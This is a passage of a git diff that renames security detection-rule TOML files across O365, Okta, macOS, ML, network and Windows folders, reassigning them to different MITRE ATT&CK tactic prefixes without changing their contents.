rename from rules/integrations/lmd/exfiltration_ml_spike_in_remote_file_transfers.toml
rename to rules/integrations/lmd/lateral_movement_ml_spike_in_remote_file_transfers.toml
diff --git a/rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml b/rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml
similarity index 100%
rename from rules/integrations/o365/collection_sharepoint_sensitive_term_search.toml
rename to rules/integrations/o365/discovery_sharepoint_sensitive_term_search.toml
diff --git a/rules/integrations/o365/collection_exchange_transport_rule_creation.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml
similarity index 100%
rename from rules/integrations/o365/collection_exchange_transport_rule_creation.toml
rename to rules/integrations/o365/exfiltration_exchange_transport_rule_creation.toml
diff --git a/rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml b/rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml
similarity index 100%
rename from rules/integrations/o365/defense_evasion_exchange_transport_rule_modification.toml
rename to rules/integrations/o365/exfiltration_exchange_transport_rule_modification.toml
diff --git a/rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml b/rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml
similarity index 100%
rename from rules/integrations/o365/persistence_identity_illicit_consent_grant_via_registered_application.toml
rename to rules/integrations/o365/initial_access_identity_illicit_consent_grant_via_registered_application.toml
diff --git a/rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml
similarity index 100%
rename from rules/integrations/o365/credential_access_identity_oauth_phishing_via_first_party_microsoft_application.toml
rename to rules/integrations/o365/initial_access_identity_oauth_phishing_via_first_party_microsoft_application.toml
diff --git a/rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml b/rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml
similarity index 100%
rename from rules/integrations/o365/credential_access_identity_unusual_sso_errors_for_user.toml
rename to rules/integrations/o365/initial_access_identity_unusual_sso_errors_for_user.toml
diff --git a/rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml b/rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
similarity index 100%
rename from rules/integrations/o365/defense_evasion_exchange_new_or_modified_federation_domain.toml
rename to rules/integrations/o365/privilege_escalation_exchange_new_or_modified_federation_domain.toml
diff --git a/rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml b/rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
similarity index 100%
rename from rules/integrations/o365/persistence_sharepoint_site_collection_admin_added.toml
rename to rules/integrations/o365/privilege_escalation_sharepoint_site_collection_admin_added.toml
diff --git a/rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_multiple_user_agent_os_authentication.toml
rename to rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml
diff --git a/rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_okta_aitm_session_cookie_replay.toml
rename to rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml
diff --git a/rules/integrations/okta/defense_evasion_user_impersonation_access.toml b/rules/integrations/okta/credential_access_user_impersonation_access.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_user_impersonation_access.toml
rename to rules/integrations/okta/credential_access_user_impersonation_access.toml
diff --git a/rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml b/rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml
similarity index 100%
rename from rules/integrations/okta/initial_access_suspicious_okta_user_password_reset_or_unlock_attempts.toml
rename to rules/integrations/okta/defense_evasion_suspicious_okta_user_password_reset_or_unlock_attempts.toml
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_okta_attempt_to_deactivate_okta_application.toml
rename to rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_okta_attempt_to_modify_okta_application.toml
rename to rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml
diff --git a/rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_sign_in_events_via_third_party_idp.toml
rename to rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml
diff --git a/rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_successful_application_sso_from_unknown_client_device.toml
rename to rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml
diff --git a/rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_multiple_sessions_for_single_user.toml
rename to rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml
diff --git a/rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_mfa_deactivation_with_no_reactivation.toml
rename to rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml
diff --git a/rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
rename to rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml
diff --git a/rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
similarity index 100%
rename from rules/integrations/okta/defense_evasion_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
rename to rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml
diff --git a/rules/macos/execution_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml
similarity index 100%
rename from rules/macos/execution_perl_outbound_network_connection.toml
rename to rules/macos/command_and_control_perl_outbound_network_connection.toml
diff --git a/rules/macos/collection_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml
similarity index 100%
rename from rules/macos/collection_high_volume_of_pbpaste.toml
rename to rules/macos/credential_access_high_volume_of_pbpaste.toml
diff --git a/rules/macos/collection_suspicious_tcc_access_granted.toml b/rules/macos/defense_evasion_suspicious_tcc_access_granted.toml
similarity index 100%
rename from rules/macos/collection_suspicious_tcc_access_granted.toml
rename to rules/macos/defense_evasion_suspicious_tcc_access_granted.toml
diff --git a/rules/macos/defense_evasion_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml
similarity index 100%
rename from rules/macos/defense_evasion_suspicious_sip_check.toml
rename to rules/macos/discovery_suspicious_sip_check.toml
diff --git a/rules/macos/command_and_control_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml
similarity index 100%
rename from rules/macos/command_and_control_installer_package_spawned_network_event.toml
rename to rules/macos/execution_installer_package_spawned_network_event.toml
diff --git a/rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml
similarity index 100%
rename from rules/macos/command_and_control_scripting_osascript_exec_followed_by_netcon.toml
rename to rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml
diff --git a/rules/macos/execution_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml
similarity index 100%
rename from rules/macos/execution_suspicious_mac_ms_office_child_process.toml
rename to rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml
diff --git a/rules/macos/persistence_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml
similarity index 100%
rename from rules/macos/persistence_remote_ssh_login_enabled.toml
rename to rules/macos/lateral_movement_remote_ssh_login_enabled.toml
diff --git a/rules/macos/initial_access_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml
similarity index 100%
rename from rules/macos/initial_access_vpn_connection_attempt.toml
rename to rules/macos/lateral_movement_vpn_connection_attempt.toml
diff --git a/rules/macos/defense_evasion_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml
similarity index 100%
rename from rules/macos/defense_evasion_account_creation_hide_at_logon.toml
rename to rules/macos/persistence_account_creation_hide_at_logon.toml
diff --git a/rules/macos/command_and_control_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml
similarity index 100%
rename from rules/macos/command_and_control_curl_execution_via_shell_profile.toml
rename to rules/macos/persistence_curl_execution_via_shell_profile.toml
diff --git a/rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml
similarity index 100%
rename from rules/macos/defense_evasion_evasion_hidden_launch_agent_deamon_creation.toml
rename to rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml
diff --git a/rules/macos/defense_evasion_hidden_plist_filename.toml b/rules/macos/persistence_hidden_plist_filename.toml
similarity index 100%
rename from rules/macos/defense_evasion_hidden_plist_filename.toml
rename to rules/macos/persistence_hidden_plist_filename.toml
diff --git a/rules/macos/execution_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml
similarity index 100%
rename from rules/macos/execution_applescript_with_admin_privs.toml
rename to rules/macos/privilege_escalation_applescript_with_admin_privs.toml
diff --git a/rules/macos/execution_explicit_creds_via_scripting.toml b/rules/macos/privilege_escalation_explicit_creds_via_scripting.toml
similarity index 100%
rename from rules/macos/execution_explicit_creds_via_scripting.toml
rename to rules/macos/privilege_escalation_explicit_creds_via_scripting.toml
diff --git a/rules/macos/persistence_local_user_added_to_admin.toml b/rules/macos/privilege_escalation_local_user_added_to_admin.toml
similarity index 100%
rename from rules/macos/persistence_local_user_added_to_admin.toml
rename to rules/macos/privilege_escalation_local_user_added_to_admin.toml
diff --git a/rules/macos/persistence_root_crontab_filemod.toml b/rules/macos/privilege_escalation_root_crontab_filemod.toml
similarity index 100%
rename from rules/macos/persistence_root_crontab_filemod.toml
rename to rules/macos/privilege_escalation_root_crontab_filemod.toml
diff --git a/rules/macos/persistence_user_added_to_admin_group.toml b/rules/macos/privilege_escalation_user_added_to_admin_group.toml
similarity index 100%
rename from rules/macos/persistence_user_added_to_admin_group.toml
rename to rules/macos/privilege_escalation_user_added_to_admin_group.toml
diff --git a/rules/ml/defense_evasion_ml_windows_anomalous_script.toml b/rules/ml/execution_ml_windows_anomalous_script.toml
similarity index 100%
rename from rules/ml/defense_evasion_ml_windows_anomalous_script.toml
rename to rules/ml/execution_ml_windows_anomalous_script.toml
diff --git a/rules/ml/execution_ml_rare_process_by_host_linux.toml b/rules/ml/persistence_ml_rare_process_by_host_linux.toml
similarity index 100%
rename from rules/ml/execution_ml_rare_process_by_host_linux.toml
rename to rules/ml/persistence_ml_rare_process_by_host_linux.toml
diff --git a/rules/ml/execution_ml_windows_anomalous_path_activity.toml b/rules/ml/persistence_ml_windows_anomalous_path_activity.toml
similarity index 100%
rename from rules/ml/execution_ml_windows_anomalous_path_activity.toml
rename to rules/ml/persistence_ml_windows_anomalous_path_activity.toml
diff --git a/rules/ml/execution_ml_windows_anomalous_process_creation.toml b/rules/ml/persistence_ml_windows_anomalous_process_creation.toml
similarity index 100%
rename from rules/ml/execution_ml_windows_anomalous_process_creation.toml
rename to rules/ml/persistence_ml_windows_anomalous_process_creation.toml
diff --git a/rules/network/initial_access_accepted_default_telnet_port_connection.toml b/rules/network/command_and_control_accepted_default_telnet_port_connection.toml
similarity index 100%
rename from rules/network/initial_access_accepted_default_telnet_port_connection.toml
rename to rules/network/command_and_control_accepted_default_telnet_port_connection.toml
diff --git a/rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml b/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml
similarity index 100%
rename from rules/network/initial_access_rdp_remote_desktop_protocol_from_the_internet.toml
rename to rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml
diff --git a/rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml b/rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml
similarity index 100%
rename from rules/network/initial_access_vnc_virtual_network_computing_from_the_internet.toml
rename to rules/network/command_and_control_vnc_virtual_network_computing_from_the_internet.toml
diff --git a/rules/network/execution_react_server_components_rce_attempt.toml b/rules/network/initial_access_react_server_components_rce_attempt.toml
similarity index 100%
rename from rules/network/execution_react_server_components_rce_attempt.toml
rename to rules/network/initial_access_react_server_components_rce_attempt.toml
diff --git a/rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml b/rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml
similarity index 100%
rename from rules/network/command_and_control_rpc_remote_procedure_call_to_the_internet.toml
rename to rules/network/initial_access_rpc_remote_procedure_call_to_the_internet.toml
diff --git a/rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml b/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml
similarity index 100%
rename from rules/network/exfiltration_smb_windows_file_sharing_activity_to_the_internet.toml
rename to rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml
diff --git a/rules/network/reconnaissance_unsecure_elasticsearch_node.toml b/rules/network/initial_access_unsecure_elasticsearch_node.toml
similarity index 100%
rename from rules/network/reconnaissance_unsecure_elasticsearch_node.toml
rename to rules/network/initial_access_unsecure_elasticsearch_node.toml
diff --git a/rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml
similarity index 100%
rename from rules/promotions/defense_evasion_endgame_cred_manipulation_detected.toml
rename to rules/promotions/privilege_escalation_endgame_cred_manipulation_detected.toml
diff --git a/rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml b/rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml
similarity index 100%
rename from rules/promotions/defense_evasion_endgame_cred_manipulation_prevented.toml
rename to rules/promotions/privilege_escalation_endgame_cred_manipulation_prevented.toml
diff --git a/rules/promotions/defense_evasion_endgame_permission_theft_detected.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml
similarity index 100%
rename from rules/promotions/defense_evasion_endgame_permission_theft_detected.toml
rename to rules/promotions/privilege_escalation_endgame_permission_theft_detected.toml
diff --git a/rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml b/rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml
similarity index 100%
rename from rules/promotions/defense_evasion_endgame_permission_theft_prevented.toml
rename to rules/promotions/privilege_escalation_endgame_permission_theft_prevented.toml
diff --git a/rules/promotions/defense_evasion_endgame_process_injection_detected.toml b/rules/promotions/privilege_escalation_endgame_process_injection_detected.toml
similarity index 100%
rename from rules/promotions/defense_evasion_endgame_process_injection_detected.toml
rename to rules/promotions/privilege_escalation_endgame_process_injection_detected.toml
diff --git a/rules/promotions/defense_evasion_endgame_process_injection_prevented.toml b/rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml
similarity index 100%
rename from rules/promotions/defense_evasion_endgame_process_injection_prevented.toml
rename to rules/promotions/privilege_escalation_endgame_process_injection_prevented.toml
diff --git a/rules/windows/persistence_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml
similarity index 100%
rename from rules/windows/persistence_outlook_home_page.toml
rename to rules/windows/command_and_control_outlook_home_page.toml
diff --git a/rules/windows/collection_adidns_wildcard.toml b/rules/windows/credential_access_adidns_wildcard.toml
similarity index 100%
rename from rules/windows/collection_adidns_wildcard.toml
rename to rules/windows/credential_access_adidns_wildcard.toml
diff --git a/rules/windows/collection_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml
similarity index 100%
rename from rules/windows/collection_browsers_unusual_parent.toml
rename to rules/windows/credential_access_browsers_unusual_parent.toml
diff --git a/rules/windows/persistence_dcsync_user_backdoor.toml b/rules/windows/credential_access_dcsync_user_backdoor.toml
similarity index 100%
rename from rules/windows/persistence_dcsync_user_backdoor.toml
rename to rules/windows/credential_access_dcsync_user_backdoor.toml
diff --git a/rules/windows/collection_dnsnode_creation.toml b/rules/windows/credential_access_dnsnode_creation.toml
similarity index 100%
rename from rules/windows/collection_dnsnode_creation.toml
rename to rules/windows/credential_access_dnsnode_creation.toml
diff --git a/rules/windows/persistence_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml
similarity index 100%
rename from rules/windows/persistence_lsass_loaded_susp_dll.toml
rename to rules/windows/credential_access_lsass_loaded_susp_dll.toml
diff --git a/rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml b/rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
similarity index 100%
rename from rules/windows/persistence_seenabledelegationprivilege_assigned_to_user.toml
rename to rules/windows/credential_access_seenabledelegationprivilege_assigned_to_user.toml
diff --git a/rules/windows/persistence_shadow_credentials.toml b/rules/windows/credential_access_shadow_credentials.toml
similarity index 100%
rename from rules/windows/persistence_shadow_credentials.toml
rename to rules/windows/credential_access_shadow_credentials.toml
diff --git a/rules/windows/persistence_spn_attribute_modified.toml b/rules/windows/credential_access_spn_attribute_modified.toml
similarity index 100%
rename from rules/windows/persistence_spn_attribute_modified.toml
rename to rules/windows/credential_access_spn_attribute_modified.toml
diff --git a/rules/windows/collection_web_config_file_access.toml b/rules/windows/credential_access_web_config_file_access.toml
similarity index 100%
rename from rules/windows/collection_web_config_file_access.toml
rename to rules/windows/credential_access_web_config_file_access.toml
diff --git a/rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml b/rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml
similarity index 100%
rename from rules/windows/persistence_masquerading_suspicious_werfault_childproc.toml
rename to rules/windows/defense_evasion_masquerading_suspicious_werfault_childproc.toml
diff --git a/rules/windows/command_and_control_msiexec_remote_payload.toml b/rules/windows/defense_evasion_msiexec_remote_payload.toml
similarity index 100%
rename from rules/windows/command_and_control_msiexec_remote_payload.toml
rename to rules/windows/defense_evasion_msiexec_remote_payload.toml
diff --git a/rules/windows/persistence_regmod_remotemonologue.toml b/rules/windows/defense_evasion_regmod_remotemonologue.toml
similarity index 100%
rename from rules/windows/persistence_regmod_remotemonologue.toml
rename to rules/windows/defense_evasion_regmod_remotemonologue.toml
diff --git a/rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml b/rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml
similarity index 100%
rename from rules/windows/persistence_scheduledjobs_at_protocol_enabled.toml
rename to rules/windows/defense_evasion_scheduledjobs_at_protocol_enabled.toml
diff --git a/rules/windows/command_and_control_suspicious_certutil_commands.toml b/rules/windows/defense_evasion_suspicious_certutil_commands.toml
similarity index 100%
rename from rules/windows/command_and_control_suspicious_certutil_commands.toml
rename to rules/windows/defense_evasion_suspicious_certutil_commands.toml
diff --git a/rules/windows/execution_suspicious_process_access_direct_syscall.toml b/rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml
similarity index 100%
rename from rules/windows/execution_suspicious_process_access_direct_syscall.toml
rename to rules/windows/defense_evasion_suspicious_process_access_direct_syscall.toml
diff --git a/rules/windows/execution_suspicious_zoom_child_process.toml b/rules/windows/defense_evasion_suspicious_zoom_child_process.toml
similarity index 100%
rename from rules/windows/execution_suspicious_zoom_child_process.toml
rename to rules/windows/defense_evasion_suspicious_zoom_child_process.toml
diff --git a/rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml b/rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml
similarity index 100%
rename from rules/windows/command_and_control_unusual_network_connection_via_dllhost.toml
rename to rules/windows/defense_evasion_unusual_network_connection_via_dllhost.toml
diff --git a/rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml b/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml
similarity index 100%
rename from rules/windows/command_and_control_unusual_network_connection_via_rundll32.toml
rename to rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml
diff --git a/rules/windows/execution_wsl_bash_exec.toml b/rules/windows/defense_evasion_wsl_bash_exec.toml
similarity index 100%
rename from rules/windows/execution_wsl_bash_exec.toml
rename to rules/windows/defense_evasion_wsl_bash_exec.toml
diff --git a/rules/windows/defense_evasion_com_object_xwizard.toml b/rules/windows/execution_com_object_xwizard.toml
similarity index 100%
rename from rules/windows/defense_evasion_com_object_xwizard.toml
rename to rules/windows/execution_com_object_xwizard.toml
diff --git a/rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml b/rules/windows/execution_command_prompt_connecting_to_the_internet.toml
similarity index 100%
rename from rules/windows/command_and_control_command_prompt_connecting_to_the_internet.toml
rename to rules/windows/execution_command_prompt_connecting_to_the_internet.toml
diff --git a/rules/windows/defense_evasion_command_shell_via_rundll32.toml b/rules/windows/execution_command_shell_via_rundll32.toml
similarity index 100%
rename from rules/windows/defense_evasion_command_shell_via_rundll32.toml
rename to rules/windows/execution_command_shell_via_rundll32.toml
diff --git a/rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml b/rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml
similarity index 100%
rename from rules/windows/defense_evasion_delayed_via_ping_lolbas_unsigned.toml
rename to rules/windows/execution_delayed_via_ping_lolbas_unsigned.toml
diff --git a/rules/windows/initial_access_downloaded_shortcut_files.toml b/rules/windows/execution_downloaded_shortcut_files.toml
similarity index 100%
rename from rules/windows/initial_access_downloaded_shortcut_files.toml
rename to rules/windows/execution_downloaded_shortcut_files.toml
diff --git a/rules/windows/initial_access_downloaded_url_file.toml b/rules/windows/execution_downloaded_url_file.toml
similarity index 100%
rename from rules/windows/initial_access_downloaded_url_file.toml
rename to rules/windows/execution_downloaded_url_file.toml
diff --git a/rules/windows/discovery_enumeration_via_wmiprvse.toml b/rules/windows/execution_enumeration_via_wmiprvse.toml
similarity index 100%
rename from rules/windows/discovery_enumeration_via_wmiprvse.toml
rename to rules/windows/execution_enumeration_via_wmiprvse.toml
diff --git a/rules/windows/defense_evasion_from_unusual_path_cmdline.toml b/rules/windows/execution_from_unusual_path_cmdline.toml
similarity index 100%
rename from rules/windows/defense_evasion_from_unusual_path_cmdline.toml
rename to rules/windows/execution_from_unusual_path_cmdline.toml
diff --git a/rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml b/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
similarity index 100%
rename from rules/windows/defense_evasion_html_help_executable_program_connecting_to_the_internet.toml
rename to rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
diff --git a/rules/windows/credential_access_posh_hacktool_functions.toml b/rules/windows/execution_posh_hacktool_functions.toml
similarity index 100%
rename from rules/windows/credential_access_posh_hacktool_functions.toml
rename to rules/windows/execution_posh_hacktool_functions.toml
diff --git a/rules/windows/defense_evasion_posh_portable_executable.toml b/rules/windows/execution_posh_portable_executable.toml
similarity index 100%
rename from rules/windows/defense_evasion_posh_portable_executable.toml
rename to rules/windows/execution_posh_portable_executable.toml
diff --git a/rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
similarity index 100%
rename from rules/windows/defense_evasion_register_server_program_connecting_to_the_internet.toml
rename to rules/windows/execution_register_server_program_connecting_to_the_internet.toml
diff --git a/rules/windows/command_and_control_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml
similarity index 100%
rename from rules/windows/command_and_control_revshell_cmd_via_netcat.toml
rename to rules/windows/execution_revshell_cmd_via_netcat.toml
diff --git a/rules/windows/command_and_control_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml
similarity index 100%
rename from rules/windows/command_and_control_scripting_remote_webdav.toml
rename to rules/windows/execution_scripting_remote_webdav.toml
diff --git a/rules/windows/persistence_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml
similarity index 100%
rename from rules/windows/persistence_shared_modules_local_sxs_dll.toml
rename to rules/windows/execution_shared_modules_local_sxs_dll.toml
diff --git a/rules/windows/defense_evasion_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml
similarity index 100%
rename from rules/windows/defense_evasion_suspicious_psexesvc.toml
rename to rules/windows/execution_suspicious_psexesvc.toml
diff --git a/rules/windows/defense_evasion_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml
similarity index 100%
rename from rules/windows/defense_evasion_via_compiled_html_file.toml
rename to rules/windows/execution_via_compiled_html_file.toml
diff --git a/rules/windows/defense_evasion_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml
similarity index 100%
rename from rules/windows/defense_evasion_via_hidden_shell_conhost.toml
rename to rules/windows/execution_via_hidden_shell_conhost.toml
diff --git a/rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml
similarity index 100%
rename from rules/windows/defense_evasion_via_mmc_console_file_unusual_path.toml
rename to rules/windows/execution_via_mmc_console_file_unusual_path.toml
diff --git a/rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml
similarity index 100%
rename from rules/windows/defense_evasion_windows_cmd_shell_susp_args.toml
rename to rules/windows/execution_windows_cmd_shell_susp_args.toml
diff --git a/rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml b/rules/windows/execution_windows_fakecaptcha_cmd_ps.toml
similarity index 100%
rename from rules/windows/defense_evasion_windows_fakecaptcha_cmd_ps.toml
rename to rules/windows/execution_windows_fakecaptcha_cmd_ps.toml
diff --git a/rules/windows/defense_evasion_windows_powershell_susp_args.toml b/rules/windows/execution_windows_powershell_susp_args.toml
similarity index 100%
rename from rules/windows/defense_evasion_windows_powershell_susp_args.toml
rename to rules/windows/execution_windows_powershell_susp_args.toml
diff --git a/rules/windows/defense_evasion_windows_script_from_internet.toml b/rules/windows/execution_windows_script_from_internet.toml
similarity index 100%
rename from rules/windows/defense_evasion_windows_script_from_internet.toml
rename to rules/windows/execution_windows_script_from_internet.toml
diff --git a/rules/windows/credential_access_smb_rare_destination.toml b/rules/windows/exfiltration_smb_rare_destination.toml
similarity index 100%
rename from rules/windows/credential_access_smb_rare_destination.toml
rename to rules/windows/exfiltration_smb_rare_destination.toml
diff --git a/rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml
similarity index 100%
rename from rules/windows/execution_volume_shadow_copy_deletion_via_powershell.toml
rename to rules/windows/impact_volume_shadow_copy_deletion_via_powershell.toml
diff --git a/rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml b/rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml
similarity index 100%
rename from rules/windows/execution_volume_shadow_copy_deletion_via_wmic.toml
rename to rules/windows/impact_volume_shadow_copy_deletion_via_wmic.toml
diff --git a/rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml
similarity index 100%
rename from rules/windows/defense_evasion_evasion_suspicious_htm_file_creation.toml
rename to rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml
diff --git a/rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml
similarity index 100%
rename from rules/windows/defense_evasion_exploit_jetbrains_teamcity.toml
rename to rules/windows/initial_access_exploit_jetbrains_teamcity.toml
diff --git a/rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml
similarity index 100%
rename from rules/windows/defense_evasion_potential_webhelpdesk_exploit.toml
rename to rules/windows/initial_access_potential_webhelpdesk_exploit.toml
diff --git a/rules/windows/execution_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml
similarity index 100%
rename from rules/windows/execution_rdp_file_mail_attachment.toml
rename to rules/windows/initial_access_rdp_file_mail_attachment.toml
diff --git a/rules/windows/execution_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml
similarity index 100%
rename from rules/windows/execution_script_executing_powershell.toml
rename to rules/windows/initial_access_script_executing_powershell.toml
diff --git a/rules/windows/execution_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml
similarity index 100%
rename from rules/windows/execution_scripts_process_started_via_wmi.toml
rename to rules/windows/initial_access_scripts_process_started_via_wmi.toml
